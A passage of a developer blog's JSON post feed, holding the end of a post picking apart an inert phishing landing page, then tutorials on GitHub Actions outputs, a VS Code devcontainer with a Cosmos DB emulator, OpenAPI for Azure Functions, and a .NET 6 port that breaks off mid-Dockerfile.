21 22 23 24 25 26 27 28 29 30 31 32 33 <!DOCTYPE html> <html> <head> <title></title> <script src="https://www.google.com/recaptcha/api.js" async defer ></script> </head> <body> <center> <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /> <form method="POST" action=""> <div class="form-group"> <div class="g-recaptcha" name="g-recaptcha" data-sitekey="6Lfx39ofAAAAAHjix51F6EBGCmAppT-UVw0CNdQO" ></div> </div> <br /><button style="width: 100px; height: 50px;" type="submit" name="submit" > submit </button> </form> </center> </body> </html> There’s no <input> fields on the page, so you’re not going to be submitting any new data to the server, so my guess is that there’s 
something server-side that I can’t see, probably storing the value of the email query string. I also do like the use of the <br> tag to add whitespace, plus a <center> tag - HTML at its finest!\nWhat’s the point This is about as far as I was about to dig through and it left me wondering just what the point of this phishing attack was. My guess is that it’s being used to harvest email addresses and verify that they are legit by looking at who clicked through the email, essentially, generating a database of “gullible fools” that would click on this sort of thing.\nBut looking at the email source the query string was never set, meaning that the point of capturing the email by using the information on the click through never did work - it was just not there, so I’m a bit at a loss.\nThe other thing I found fascinating is the level of sophistication in the email, down to the footer with contact details of the original victim and that the email headers suggest it came from the building companies systems. This suggests that it was probably done through a virus on the original victims machine, rather than a random phishing service.\nWe contacted the builder and informed them of the email and a few hours later an email from the CEO went out addressing it and apologising, so I’m glad they acknowledged the problem.\nI’ve also reported the account to codesandbox, so it’ll be up to them to take it down.\nOverall, it was a bit of fun pulling this little attempt at phishing me apart.\n", "id": "2022-05-10-breaking-down-a-phishing-attempt" }, { "title": "Learn GraphQL at NDC Melbourne", "url": "https://www.aaron-powell.com/posts/2022-05-02-learn-graphql-at-ndc-melbourne/", "date": "Mon, 02 May 2022 05:30:23 +0000", "tags": [ "graphql", "public-speaking" ], "description": "Wanting to learn GraphQL? Come join my workshop", "content": "Is GraphQL something that’s been on your backlog to learn? Well, there’s no better time than the present to get to it because as part of NDC Melbourne in June this year I’ll be running a two-day workshop to take you from zero to hero with GraphQL.\nMy sales pitch to you So, what are you going to learn over the two days?\nFirst off, we’ll look at just what GraphQL is and why it’s something worth exploring for your applications. I won’t sugarcoat it, GraphQL won’t be right for everything, so it’s best that we know just when to use it, rather than blindly following technology trends.\nBut then it’s hand-on coding, we’re going to be building a GraphQL server and connecting it to a database (I’ll be using TypeScript, but there’ll be provisions if you want to use .NET or any other language). We’ll look at the terminology and components that come together to make a GraphQL server tick. 
Once our server is ready we’ll look at how you consume GraphQL at a client, after all, an API is only as useful as the client that consumes it.\nFor the final part of the workshop we’ll explore how to take our sample application to production, exploring topics like security, API access controls, CI/CD, how we avoid creating our own DDoS servers using GraphQL and how to add GraphQL support to existing APIs without having to rewrite them from scratch.\nShould you attend Well, I’m pretty biased on this so the answer is of course yes!\nPersonal biases aside, GraphQL is a very relevant technology and there’s many applications that it’s better suited for than traditional REST APIs, so if you’re looking to explore it, grab a ticket and come learn the in’s and out’s with me.\n", "id": "2022-05-02-learn-graphql-at-ndc-melbourne" }, { "title": "Accessing a Static Web Apps Url From GitHub Actions", "url": "https://www.aaron-powell.com/posts/2022-04-08-accessing-a-swa-url-from-github-actions/", "date": "Fri, 08 Apr 2022 05:49:45 +0000", "tags": [ "javascript", "azure", "devops" ], "description": "Are you using Static Web Apps and wanting to know the URL of the app you deployed in GitHub Actions? Here's how to do it", "content": "I was recently working on a project where I wanted to add some tests using Playwright to perform headless browser tests during the CI/CD pipeline.\nThankfully, my colleague Nitya has already written a blog post on how to do that, which you can read here.\nThis works just fine when the tests are running on the main branch, but I hit a snag with pull requests, because with Static Web Apps we get pre-production environments for pull requests and those are deployed with their own URLs.\nNow we have a problem because in my tests I can’t just have:\n1 2 3 4 5 6 test("basic test", async ({ page }) => { await page.goto("https://bit.ly/recipes-for-aj"); await expect(page).toHaveTitle("Recipes 4 AJ"); await page.locator("text=Tags").click(); }); Because that will always navigate to the production site! So, how can we solve this?\nFinding the URL of a deployment If you’ve looked into the logs of the deployment of a Static Web App you’ll have noticed that the URL is output there, whether it’s the URL with custom domain, or the pre-production environment URL on a PR, so this means that the GitHub Actions are aware of the URL.\nNext stop, azure/static-web-apps-deploy to have a look at how the Action works. Alas it’s a Docker Action, which means we can’t see the internals of it, but that’s not a major problem because we can check out the actions.yaml and see the following:\n1 2 3 outputs: static_web_app_url: description: "Url of the application" Awesome! 
The Action will actually output the URL for us.\nUsing output across jobs Following Nitya’s pattern, we’re going to create a new job in our workflow to run the Playwright tests:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 jobs: build_and_deploy_job: # snip test: name: "Test site using Playwright" timeout-minutes: 60 needs: build_and_deploy_job runs-on: ubuntu-20.04 steps: - uses: actions/checkout@master - uses: actions/setup-node@v2 with: node-version: '14.x' - name: Install dependencies run: | cd testing npm ci npx playwright install-deps npx playwright install - name: Run Playwright Tests continue-on-error: false working-directory: testing run: | npx playwright test --reporter=html --config playwright.config.js We’ll also update our test to use an environment variable to provide the URL, rather than having it embedded:\n1 2 3 4 5 test("basic test", async ({ page }) => { await page.goto(process.env.SWA_URL); // Be assertive }); To get that as an environment variable we have to first output it from the build_and_deploy_job:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 jobs: build_and_deploy_job: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest name: Build and deploy website outputs: static_web_app_url: ${{ steps.swa.outputs.static_web_app_url }} steps: - uses: actions/checkout@v3 with: submodules: true - name: Build And Deploy id: swa # snip The important part is static_web_app_url: ${{ steps.swa.outputs.static_web_app_url }} in which were telling GitHub Actions that the step swa will have an output that we want to make an output of this job.\nWe can then use it in our test job like so:\n1 2 3 4 5 6 7 8 9 test: name: "Test site using Playwright" timeout-minutes: 60 needs: build_and_deploy_job runs-on: ubuntu-20.04 env: SWA_URL: ${{ needs.build_and_deploy_job.outputs.static_web_app_url }} steps: # snip The snippet ${{ needs.build_and_deploy_job.outputs.static_web_app_url }} tells GitHub Actions to look at the dependent job (needs.build_and_deploy_job) outputs and find the one we want and set it as an environment variable.\nAnd just like that, you no longer need to have hard-coded URLs for your tests.\nConclusion By leveraging output variables from GitHub Action steps and jobs we’re able to simplify our GitHub workflows when it comes to doing something like automated tests using Playwright.\nTo show this in action I’ve created a PR for Nitya’s sample application so you can see the changes that I made and how the GitHub Actions run now looks.\n", "id": "2022-04-08-accessing-a-swa-url-from-github-actions" }, { "title": "The Ultimate Web Dev Environment", "url": "https://www.aaron-powell.com/posts/2022-03-04-the-ultimate-web-dev-environment/", "date": "Fri, 04 Mar 2022 00:25:57 +0000", "tags": [ "javascript", "webdev", "serverless" ], "description": "Let's setup the ultimate local dev experience for making web applications.", "content": "This is a long post and I’ve presented on this topic, so if you prefer to watch a video rather than reading, scroll to the end and check out the video.\nThere’s no denying that I am a huge fan of Static Web Apps (SWA), I have a lot of posts about it on my blog. 
But one thing I’m always trying to do is to work out how we can make it easier to do development.\nFor today’s blog post, I want to look at how we can create the ultimate dev environment for web development, one where you can clone a Git repository, open in VS Code and launch it with all debuggers attached and ready to go. Naturally, we’re going to have some Static Web Apps specific things in here, but most of it will be applicable for a wide range of web applications.\ndevcontainer, storage and API’s We’re going to start at the bottom, where we can store data, and since we’re using Azure Functions for storage, we want an easy way in which we can store data without having to run a cloud service.\nThe easiest way to do data storage with Azure Functions is with Cosmos DB as it has provided bindings, and as I showed in a previous post there’s a new emulator we can run in a Docker container.\nWe’re going to build on the ideas of that previous post but make it a bit better for the web (so I won’t repeat the process for adding the Cosmos DB emulator container).\nThe web container We need a container in which we can run SWA, as well as the devcontainer.json file, but since we’re going to need a container with the database, we’ll leverage the Docker compose remote container patter. We can scaffold that up using the Remote-Containers: Add Development Container Configuration Files from the Command Pallette and choosing Docker Compose (you may need to go through Show All Definitions first to get this one). Once they are scaffolded, open the Dockerfile and ensure that we’ve got the right base image:\n1 FROM mcr.microsoft.com/azure-functions/python:4-python3.9-core-tools This container contains the .NET Core runtime (needed by the Azure Functions runtime when using bindings like CosmosDB), the Azure Functions CLI tool, the Azure CLI and Python (Python is needed for the Azure CLI).\nLike last time, we’ll leave the boilerplate code in for setting up the inter-container communication, but we need to install Node.js and the best way to do that for a devcontainer is using the Node.js install script, which we’ll add to the library-scripts folder. We’ll also add a step to install the SWA CLI, so that we can use that in our container (this was adapted from the SWA devcontainer).\nWith everything setup, our Dockerfile will look like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 FROM mcr.microsoft.com/azure-functions/python:4-python3.9-core-tools # [Option] Install zsh ARG INSTALL_ZSH="true" # [Option] Upgrade OS packages to their latest versions ARG UPGRADE_PACKAGES="false" # [Option] Enable non-root Docker access in container ARG ENABLE_NONROOT_DOCKER="true" # [Option] Use the OSS Moby CLI instead of the licensed Docker CLI ARG USE_MOBY="true" # Install needed packages and setup non-root user. Use a separate RUN statement to add your # own dependencies. A user of "automatic" attempts to reuse an user ID if one already exists. 
ARG USERNAME=automatic ARG USER_UID=1000 ARG USER_GID=$USER_UID ARG NODE_VERSION="lts/*" ENV NVM_DIR="/usr/local/share/nvm" \\ NVM_SYMLINK_CURRENT=true \\ PATH="${NVM_DIR}/current/bin:${PATH}" COPY library-scripts/*.sh /tmp/library-scripts/ RUN apt-get update \\ && /bin/bash /tmp/library-scripts/common-debian.sh "${INSTALL_ZSH}" "${USERNAME}" "${USER_UID}" "${USER_GID}" "${UPGRADE_PACKAGES}" "true" "true" \\ # Use Docker script from script library to set things up && /bin/bash /tmp/library-scripts/docker-debian.sh "${ENABLE_NONROOT_DOCKER}" "/var/run/docker-host.sock" "/var/run/docker.sock" "${USERNAME}" \\ # Install Node.js && bash /tmp/library-scripts/node-debian.sh "${NVM_DIR}" \\ # Install SWA CLI && su vscode -c "umask 0002 && . /usr/local/share/nvm/nvm.sh && nvm install ${NODE_VERSION} 2>&1" \\ && su vscode -c "umask 0002 && npm install --cache /tmp/empty-cache -g @azure/static-web-apps-cli" \\ # Clean up && apt-get autoremove -y && apt-get clean -y \\ && rm -rf /var/lib/apt/lists/* /tmp/library-scripts/ # Setting the ENTRYPOINT to docker-init.sh will configure non-root access # to the Docker socket. The script will also execute CMD as needed. ENTRYPOINT [ "/usr/local/share/docker-init.sh" ] CMD [ "sleep", "infinity" ] Note: Just remember to change the remoteUser of the devcontainers.json file from vscode to node, as that’s the user the base image created.\nSetting up the devcontainer Since we want to get up and running with as few additional steps as possible, we’ll take advantage of the postCreateCommand in the devcontainer.json file. This option allows us to run a command, like npm install, but we’re going to take it a step further and write a custom shell script to run in the container that will install the web packages, the API packages and setup our CosmosDB connection locally.\nCreate a new file called ./devcontainer/setup.sh and start with installing the right version of Node.js and the packages:\n1 2 3 4 5 6 7 #/bin/sh . ${NVM_DIR}/nvm.sh nvm install --lts npm ci cd api npm ci cd .. I’ve used npm ci here, rather than npm install, mostly to suppress a lot of the verbosity in the output during install, but that’s the only reason.\nNext, we’ll check if we can access the CosmosDB container, and if we can, get the connection information for the API’s local.settings.json file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 if ping -c 1 cosmos &> /dev/null then echo Cosmos emulator found echo Preping emulator if [ ! 
-f "./api/local.settings.json" ] then sleep 5s curl --insecure -k https://cosmos:8081/_explorer/emulator.pem > ~/emulatorcert.crt sudo cp ~/emulatorcert.crt /usr/local/share/ca-certificates/ sudo update-ca-certificates ipaddr=$(ping -c 1 cosmos | grep -oP '\\(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\)' | sed -n 's/(//p' | sed -n 's/)//p' | head -n 1) key=$(curl -s https://$ipaddr:8081/_explorer/quickstart.html | grep -Po 'value="(?![Account]|[https]|[mongo])(.*)"' | sed 's/value="//g' | sed 's/"//g') echo "{ \\"IsEncrypted\\": false, \\"Values\\": { \\"FUNCTIONS_WORKER_RUNTIME\\": \\"node\\", \\"AzureWebJobsStorage\\": \\"\\", \\"StartupAdventurer_COSMOSDB\\": \\"AccountEndpoint=https://$ipaddr:8081/;AccountKey=$key;\\", \\"SHORT_URL\\": \\"http://localhost:4820\\" } }" >> ./api/local.settings.json fi fi Just a reminder, this post doesn’t cover the addition of the Cosmos DB emulator, check out my previous post for that.\nOk, this is a long and ugly script file, so let’s break down what it does.\nFirst, it’ll check to see if it can find the container, using the name we’ve said the container should be in our Docker Compose file, cosmos. If it responds to ping, we can assume that it’s the one we want to use.\nNext, we’ll check for the api/local.settings.json file, because if it’s there, we don’t want to override it (you might be testing against a remote Cosmos instance), but assuming it isn’t there we’ll sleep for a few seconds, just to make sure the emulator has started, download the local certificate and install it to the certificate store.\nLastly, it’s time to create the connection information, so we’ll resolve the IP of the emulator container using ping and some shell parsing, then we’ll use cURL to get the page with the connection string on it and some horrible grep regex to find the right field in the HTML and extract the value.\nI’ll freely admit that this is pretty ugly and hacky in parsing the connection string out, but it’s the best I could find that didn’t require hard coded values.\nWith our IP and account key, we can create the JSON file for the API, with a bit of echo and string interpolation.\nThen within the devcontainers.json file we can add "postCreateCommand": "sh ./.devcontainer/startup.sh" to have our script run.\nUsing the self-signed certificate Something I made a comment of in the previous post was that Node doesn’t make it easy to use self-signed certificates and this caused some challenges when it came to using the CosmosDB emulator (you’d need to set an environment value that would result in a warning on all network calls).\nAfter some digging around, it turns out that there is a way to solve this, using the --use-openssl-ca flag to the Node.js binary, which tells it to use the local certificate store as well. That’s all well and good when you can control the launching of a Node.js binary, but what if it’s not under your control (it’s launched by a third party)? We can use the NODE_OPTIONS environment variable to apply a CLI flag to ever time Node is launched, and that can be controlled with the remoteEnv section of devcontainers.json:\n1 2 3 4 "remoteEnv": { "LOCAL_WORKSPACE_FOLDER": "${localWorkspaceFolder}", "NODE_OPTIONS": "--use-openssl-ca" }, Awesome, now any Node process we run can talk to the CosmosDB emulator via HTTPS using the provided certificate.\nExtensions VS Code has lots of extensions, and everyone has their favourite. 
But extensions can be used for more than adding colours to indents or providing additional language support; they can also be used to enforce standards within a repository.\nJavaScript projects will often use formatters and linters to do this, with prettier and eslint being two of the most popular.\nWith VS Code we can define an extensions.json file within the .vscode folder that contains a list of extensions that VS Code will offer to install for the user when they open a folder. Here’s a base set that I use for this kind of project:\n{ "recommendations": [ "ms-azuretools.vscode-docker", "ms-azuretools.vscode-azurefunctions", "ms-azuretools.vscode-azurestaticwebapps", "ms-azuretools.vscode-cosmosdb", "ms-vsliveshare.vsliveshare-pack", "github.vscode-pull-request-github", "GitHub.copilot", "editorconfig.editorconfig", "dbaeumer.vscode-eslint", "esbenp.prettier-vscode" ] } Because we’re within a Docker container, we may as well install the Docker extension; it’ll give us some syntax highlighting and the ability to inspect the container if required.\nAs we’re talking about Static Web Apps and CosmosDB, having those extensions (including Azure Functions, which backs the API side of SWA) installed is a good idea. You can even connect the CosmosDB emulator to VS Code!\nFor collaboration, I include VS Code Live Share. This will just make it easier for everyone to work together on the project and do as much collaboration from within VS Code itself, without context switching.\nSince I’m using GitHub, I’ve added the GitHub extension and GitHub Copilot, because it’s awesome.\nFinally, we’ll include extensions for EditorConfig, eslint and prettier, which helps set up a consistent environment and ensures that we’re all doing linting and formatting without having to think about it.\nSince we’re using a devcontainer, you can also add these to the devcontainer.json list of extensions, so that VS Code automatically installs them when you create a devcontainer, meaning the environment is fully configured and ready to run when opened.\nDebugging With our environment set up, and able to be repeatably set up, it’s now time to do some actual work; and that means we’re likely to do some debugging.\nServer-side debugging Whether we’re building an app that runs a Node.js server like Express or using a serverless backend like Azure Functions (which SWA does), we’re going to want some way to debug the server-side code.\nVS Code has made some major improvements to the JavaScript debugger to make this simpler. Now, any time you run Node from a terminal, VS Code will automatically attach the debugger, meaning all you need to do is pop open the terminal (CTRL + `) and run npm start to have the debugger set up.
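For reference, here’s roughly what those npm start scripts might map to in this kind of project. This is just a sketch that assumes a create-react-app style front end with the Azure Functions API living in the api folder, so adjust it for whatever your project actually uses.

package.json (front end, assuming create-react-app):

{
  "scripts": {
    "start": "react-scripts start"
  }
}

api/package.json (assuming the Azure Functions Core Tools are available in the container):

{
  "scripts": {
    "start": "func start"
  }
}

Either way, as long as the process is started from VS Code’s terminal, the debugger attaches without any extra configuration.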
You can learn more about the new debugger on VS Codes docs.\nClient-side debugging Whether you’re using a framework like React, or doing something with gasp vanilla JS, you’ll likely have to debug the client-side JavaScript at some point, which will see you opening the browser developer tools and setting breakpoints.\nWhile this is 1000 times better than when I first started doing web development (shout out to all those who did alert-based debugging!), it still results in a disconnect between the place we build our app and the place we debug it.\nWell, another new feature of the VS Code JavaScript debugger is browser debugging!\nTo use this, open a link from a terminal that has the JavaScript debugger attached or using the Debug: Open Link command from the command palette (CTRL + SHIFT + P), and now VS Code will connect to Edge or Chrome (depending on which is your default browser, sorry no Firefox at the moment) and forward all client-side JavaScript debugging to VS Code, allowing you to put a breakpoint on the exact file you wrote and debug it.\nThis also means that if you’re debugging an end-to-end process, like a button click through fetch request to the server, you have a single tool in which you are doing debugging, no switching between the browser and editor for different points in the debug pipeline.\nAside - this doesn’t work reliably from within a devcontainer, especially if you’re using them on Windows with WSL2. This is because you’re trying to hop across a lot of network and OS boundaries to connect the various tools together… but then again, debugging the client-side JavaScript in a browser running on Windows while the server is running on a Linux container via WSL2, back to a UI tool running on Windows… I’m not surprised it can be a bit unreliable!\nLaunch it all 🚀 While yes, we can pop open a bunch of terminals in VS Code and run npm start in the right folder, we can make it even simpler than that to get our app running and debugging, and that’s using launch.json to start the right debugger.\nHere’s one that will 1) start the front-end app, 2) start Azure Functions and 3) run the SWA CLI to use as our entry point:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 { "version": "0.2.0", "configurations": [ { "command": "swa start http://localhost:3000 --api http://localhost:7071", "name": "Run emulator", "request": "launch", "type": "node-terminal" }, { "command": "npm start", "name": "Run frontend", "request": "launch", "type": "node-terminal" }, { "command": "npm start", "name": "Run backend", "request": "launch", "type": "node-terminal", "cwd": "${workspaceFolder}/api" } ] } This would still require us to run three separate commands to start each debugger, but thankfully VS Code has an answer for that, using compound launch configurations. 
This is where we provide an array of launch commands and VS Code will run all of them for us:\n{ "version": "0.2.0", "configurations": [ { "command": "swa start http://localhost:3000 --api http://localhost:7071", "name": "Run emulator", "request": "launch", "type": "node-terminal" }, { "command": "npm start", "name": "Run frontend", "request": "launch", "type": "node-terminal" }, { "command": "npm start", "name": "Run backend", "request": "launch", "type": "node-terminal", "cwd": "${workspaceFolder}/api" } ], "compounds": [ { "name": "Launch it all 🚀", "configurations": ["Run emulator", "Run frontend", "Run backend"] } ] } Admittedly, this will cause the SWA CLI to run before the other components are running, so it does sometimes time out and need to be restarted (especially if you’re using TypeScript to do a compilation step before launching the Functions), but I find that to be a minor issue in the scheme of things - just find the right debugger on the toolbar and restart it.\nDebugger Extensions Did you know that there are extensions to make the VS Code JavaScript debugger even more powerful than it already is? These are two that I like to add to my extensions.json and devcontainer.json to ensure that they are always available.\nPerformance Insights Microsoft released a companion extension to the VS Code debugger, vscode-js-profile-flame, which will give you real-time performance metrics (CPU and memory) for the JavaScript app that you’re debugging.\nWhat’s even cooler is that if you’re debugging a client-side app, you’ll also get metrics for things like the DOM, restyle and re-layout events, which is important diagnostic information when you’re performance tuning a web app!\nDebugging Styles There’s one more part of a web application we may need to debug, and that’s the CSS (yes, I’m calling it debugging, don’t @ me 😝).\nYou might think that this is something that you’ll still be context switching to the browser for, but nope! The Microsoft Edge team has an extension that brings the element inspector and network panel into VS Code.\nNow, if you use the inspector to find an element in the DOM, you’ll find the CSS that is applied, with the file link taking you to the file in VS Code, even if you’re using a source map! This means that you don’t have to jump between the browser to inspect the elements and the editor to persist updates; you’re right in the editor with the originally authored file, reducing context switching.\nTo use this, we can use the Edge extension from the sidebar to launch a new instance of Edge with VS Code attached, but be aware that going this route will not connect the JavaScript debugger to that version of Edge.
If you have the JavaScript debugger attached and the DOM/network inspector, there’s a new icon on the debugger toolbar (next to the drop down list to change the debugger you’re attached to) that, when clicked, will connect the Edge debugger extension to a running version of Edge!\nSo, with this we can debug the server code, the client code, inspect performance metrics, inspect the DOM, edit styles and view the network requests, all without leaving VS Code.\nPretty slick if you ask me.\nAgain, this can be hit and miss when running in a devcontainer for obvious reasons.\nConclusion This is, admittedly, quite a long post, but that’s because there really is a lot of stuff to cover here.\nFirst, we looked at how to make a completely local, repeatable dev environment using the Linux emulator for CosmosDB and combine that with another Docker container that we can build a web app within.\nNext, we setup a consistent web dev environment by pre-installing VS Code extensions into it that will make it easier to enforce style and linting rules for a project, reducing the onboarding curve for someone into a project.\nFinally, we looked at debugging, and how VS Code can debug both the server and client JavaScript, that we can use compound launch tasks to start all the servers we need (and even the SWA CLI), before learning about two more extensions that can level up the debugging experience by introducing performance metrics and bringing more of the browser dev tools into VS Code itself.\nIf you want to see how this can be applied to a repo, I’ve forked the Startup Adventurer SWA project and added everything to it.\nAlso, since this is a long post, I’ve recorded a video where I’ve walked through everything, for those who are more visual learners.\n", "id": "2022-03-04-the-ultimate-web-dev-environment" }, { "title": "OpenAPI for JavaScript Azure Functions", "url": "https://www.aaron-powell.com/posts/2022-02-08-openapi-for-javascript-azure-functions/", "date": "Tue, 08 Feb 2022 22:38:39 +0000", "tags": [ "azure", "serverless", "javascript", "azure-functions" ], "description": "A new tool for generating OpenAPI specs from JavaScript and TypeScript Azure Functions", "content": "OpenAPI, formerly known as Swagger (or still known, depending who you ask!), is used to describe a REST API’s\nLast year my colleague Justin Yoo released an extension for .NET Azure Functions to generate OpenAPI definitions and not long afterwards he reached out to me on whether it’d be possible to do something similar for JavaScript/TypeScript Functions.\nWell, good news, I’ve created a npm package to do that, which you can find on GitHub and in this post we’ll take a look at how to use it.\nHow it works This npm package works conceptually similar to the .NET one in that you annotate the Function handler to provide OpenAPI schema information. 
This is done using a wrapper, or higher order, function, which takes a JavaScript object in that represents the schema for OpenAPI.\nThe second part of the plugin is used to create an endpoint which the OpenAPI spec file will be exposed via.\nAlso, the package will give you the option to use each of the different spec version, v2, v3 and v3.1, so you can describe the API in the way that’s right for consumers.\nAnnotating a Function Let’s look at how we can annotate a Function to expose an OpenAPI spec, and we’ll look at the Trivia Game example, specifically the game-get API.\nNote: The Function handler doesn’t really matter as there’s (at least currently) no inspection of it being undertaken, JavaScript doesn’t have enough of a type system to do runtime reflection and figure that stuff out on the fly, so I’ll keep that abbreviated for the sample.\nWe’ll use the OpenAPI 3.1 spec, which is the latest at time of authoring, as the schema, so the first thing is to import the mapping function:\n1 2 3 4 5 6 7 8 9 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { mapOpenApi3_1 as openApi } from "@aaronpowell/azure-functions-nodejs-openapi"; export default async function( context: Context, req: HttpRequest ): Promise<void> { // snip } Next, we’ll change the export default to be a call to the mapping function, rather than the Function handler itself:\n1 2 3 4 5 6 7 8 9 10 11 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { mapOpenApi3_1 as openApi } from "@aaronpowell/azure-functions-nodejs-openapi"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { // snip }; export default openApi(httpTrigger, "/game/{gameId}", {}); The mapOpenApi3_1 (aliased as openApi in my sample) takes three arguments:\nThe Function handler that the trigger invokes The path for the API The OpenAPI spec definition for this path Note: If you’re using TypeScript, you’ll get type help as you build out your schema, thanks to the openapi-types npm package.\nThis Function will respond on a GET request, expect the gameId to be a URL parameter and return a 200 when the game is found or a 404 if it is not, so we can describe that in our object. Let’s start with the parameter:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { mapOpenApi3_1 as openApi } from "@aaronpowell/azure-functions-nodejs-openapi"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { // snip }; export default openApi(httpTrigger, "/game/{gameId}", { get: { parameters: [ { name: "gameId", in: "path", required: true, description: "Gets a game that's being played", schema: { type: "string" } } ] } }); The top level of the object is the verb that we’re going to be working with (you can define multiple verbs for each Function) and then we use the parameters array to describe the parameter. The gameId is being describe as required and that it’s a string, plus we can attach some metadata to it if we desire, I’m giving it a description for example.\nNow we can define some responses. 
Let’s start simple with the 404:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { mapOpenApi3_1 as openApi } from "@aaronpowell/azure-functions-nodejs-openapi"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { // snip }; export default openApi(httpTrigger, "/game/{gameId}", { get: { parameters: [ { name: "gameId", in: "path", required: true, description: "Gets a game that's being played", schema: { type: "string" } } ], responses: { "404": { description: "Unable to find a game with that id" } } } }); Here we’ve added a new responses property and we can define any status code we want as the response code and attach info to it. Since this was a 404, all I’ve done is defined the description as it won’t return a body. For a more complex one, let’s put in the 200:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { mapOpenApi3_1 as openApi } from "@aaronpowell/azure-functions-nodejs-openapi"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { // snip }; export default openApi(httpTrigger, "/game/{gameId}", { get: { parameters: [ { name: "gameId", in: "path", required: true, description: "Gets a game that's being played", schema: { type: "string" } } ] }, responses: { "200": { description: "Successful operation", content: { "application/json": { schema: { type: "object", allOf: [ { $ref: "#/components/schemas/Game" } ] } } } }, "404": { description: "Unable to find a game with that id" } } }); The 200 response will have a body and that is defined in the content property, in which you can set the content for the different possible mime types. I’m only supporting a mime type of application/json, so that’s all that’s defined and for the content it returns we’re using a schema reference to a component defined elsewhere in our spec. This is useful if you’ve got objects that can be used in multiple places, which the Game time would likely be (it’s shared between GET and POST in the sample).\nBut that’s the first part completed, we’ve defined the spec information for our game-get API, on to creating the endpoint that will make it available to us.\nDefining the swagger.json endpoint We’ve got to the effort of annotating our Function but there needs to be some way in which consumers and get that, and to do that, we need to create a Function for them to access it. Start by creating a new HTTP Trigger Function, delete it’s contents and then we can use another helper function from the npm package:\n1 2 3 import { generateOpenApi3_1Spec } from "@aaronpowell/azure-functions-nodejs-openapi"; export default generateOpenApi3_1Spec({}); With this Function we’re going define the shared metadata and components that our OpenAPI spec requires, as it’ll be merged with the annotated Functions at runtime. Start by telling consumers about the API:\n1 2 3 4 5 6 7 8 import { generateOpenApi3_1Spec } from "@aaronpowell/azure-functions-nodejs-openapi"; export default generateOpenApi3_1Spec({ info: { title: "Awesome trivia game API", version: "1.0.0" } }); This is really the minimum you need to do, but since we used $ref to reference a shared component schema, we should define that as well. 
I’ll only show one of the shared components, as this object model has components that reference other components, but you should get the idea:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 import { generateOpenApi3_1Spec } from "@aaronpowell/azure-functions-nodejs-openapi"; export default generateOpenApi3_1Spec({ info: { title: "Awesome trivia game API", version: "1.0.0" }, components: { schemas: { Game: { type: "object", properties: { id: { type: "string", description: "Unique identifier for the game" }, state: { type: "string", description: "The status of the game", enum: ["WaitingForPlayers", "Started", "Complete"] }, questions: { type: "array", items: { $ref: "#/components/schemas/Question" } }, players: { type: "array", items: { $ref: "#/components/schemas/Player" } }, answers: { type: "array", items: { $ref: "#/components/schemas/PlayerAnswer" } } } } } } }); And there you have it, Game is now defined and can be used as a reference elsewhere within our spec. You can find the full implementation with all other schema objects in the GitHub source.\nStart up your Azure Functions (with CORS enabled) and pop the spec endpoint into Swagger UI and you’ll see your docs generated!\nConclusion There we have it, a working app in Azure Functions which provides OpenAPI docs for anyone who wants to consume them.\nRight now this is a proof-of-concept project more than anything, and we’re looking for feedback on whether this is a useful tool to have for people creating Azure Functions in JavaScript/TypeScript or whether there’d be a better solution, so if you want to give it a try take the npm package for a spin and get in touch.\nI have ideas of things to do next, but I’m more keen to solve the problems that you’d experience with it first.\n", "id": "2022-02-08-openapi-for-javascript-azure-functions" }, { "title": "httpstat.us - Now With .NET 6", "url": "https://www.aaron-powell.com/posts/2022-01-17-httpstatus-now-with-net-6/", "date": "Mon, 17 Jan 2022 04:33:38 +0000", "tags": [ "web", "dotnet" ], "description": "Bringing this little service to the modern age", "content": "Over a decade ago, Tatham Oddie pushed the first commit, followed closely by my commit of the starting code, to what would become httpstat.us. Fun fact - this was originally a Ruby app with a database, but it was rewritten the following month in C# on ASP.NET MVC3.\nYears went by, I kept renewing the domain and the Azure resourced paid, the codebase was upgraded to the latest .NET Framework runtimes, but it kind of just… existed.\nEventually Mickaël Derriey ported it to .NET Core but because of reasons, this never got deployed, and it just kind of sat there.\nWell, at the end of 2021 I had some time on my hands, so I decided it was time to finish what’d been started, port to .NET 6 and run it as a containerised app.\nPorting to .NET 6 was really straight forward a process, just change the Target Framework Moniker to net6.0 and update the GitHub Actions, and we were done. The real fun can to deploying it to Azure as a container.\nMy goal was to deploy it as a custom App Service container and then make that container available for anyone who wants to self-host the site.\nSite goes boom With the Dockerfile created, a new GitHub Actions pipeline to build and publish container images, and a step to update the App Service to use them, I assumed everything would be all good. 
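For context, a Dockerfile for a .NET 6 web app generally follows the standard multi-stage pattern. Here’s a sketch of that shape (the project and DLL names are placeholders, not the actual httpstat.us files):

# build stage - restore and publish the app using the .NET 6 SDK image
FROM mcr.microsoft.com/dotnet/sdk:6.0 AS build
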